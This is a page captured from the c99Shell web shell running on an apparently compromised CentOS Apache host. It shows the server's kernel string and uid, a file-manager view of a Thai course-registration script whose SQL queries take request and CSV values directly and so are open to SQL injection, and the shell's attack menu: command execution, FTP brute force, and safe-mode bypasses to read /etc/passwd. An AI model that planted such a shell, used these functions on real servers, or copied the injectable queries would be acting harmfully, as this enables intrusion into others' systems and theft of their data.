!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reg-tools/   drwxr-xr-x
Free 52.66 GB of 127.8 GB (41.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addCourseCSV.php (4.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
	if (isset($_FILES['fileUpload'])) {

		$file = strtolower($_FILES["fileUpload"]["name"]);
		$type = strrchr($file, ".");
		if (($type == ".csv")) {
			$objFopen = fopen($_FILES["fileUpload"]["tmp_name"], 'r');
			if ($objFopen) {
				while (!feof($objFopen)) {
					$tmp[] = fgetcsv($objFopen);
				}
				fclose($objFopen);

				$sql = "SELECT * FROM rg_Curriculum WHERE curId = '" . $_REQUEST["curSelect"] . "'";
				$link->query($sql);
				$rsCur = $link->getnext();

				echo "
    ***** นำเข้าข้อมูลรายวิชา " . $rsCur->curName . " ******
";

				for ($i = 1; $i < count($tmp); $i++) {

					$sql = "SELECT * FROM rg_CurriculumStructure WHERE csCurId = '" . $_REQUEST["curSelect"] . "' AND csSeq = '" . $tmp[$i][11] . "'";
					$link->query($sql);
					$rsCs = $link->getnext();

					$sql = "INSERT INTO rg_Course VALUES ('','" . $tmp[$i][1] . "','" . $tmp[$i][2] . "','" . $tmp[$i][3] . "','" . $tmp[$i][4] . "','','','','','" . $tmp[$i][7] . "','" . $tmp[$i][8] . "','" . $tmp[$i][9] . "','" . $tmp[$i][8] . "','" . $tmp[$i][9] . "','" . $tmp[$i][10] . "','" . $tmp[$i][5] . "','Y','','" . $rsCs->csCdId1 . "','1',now(),'reg-tools',now(),'reg-tools')";
					$link->query($sql);

					$sql = "INSERT INTO rg_ProgramCourses VALUES ('" . $rsCs->csCurId . "','" . $rsCs->csCdId1 . "','" . $rsCs->csCdId2 . "','" . $link->last_insert_id() . "','C','C','Y')";
					$link->query($sql);


					echo "   " . $i . ".บันทึกข้อมูลสำเร็จ -> " . $tmp[$i][1] . " " . $tmp[$i][3] . "
";
				}
			}
		} else {
			echo '

การอัพโหลดไม่สำเร็จ !!!
กรุณาอัพโหลดไฟล์ CSV เท่านั้น
';
		}
	}
} else {
?>
	

		

			
เพิ่มข้อมูลรายวิชา

			

				
				
				

					กรุณาเลือกหลักสูตร
				

			

			
			

				
				
				

					กรุณาเลือกไฟล์ csv
				

			

			

				
			

		

	


	


bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--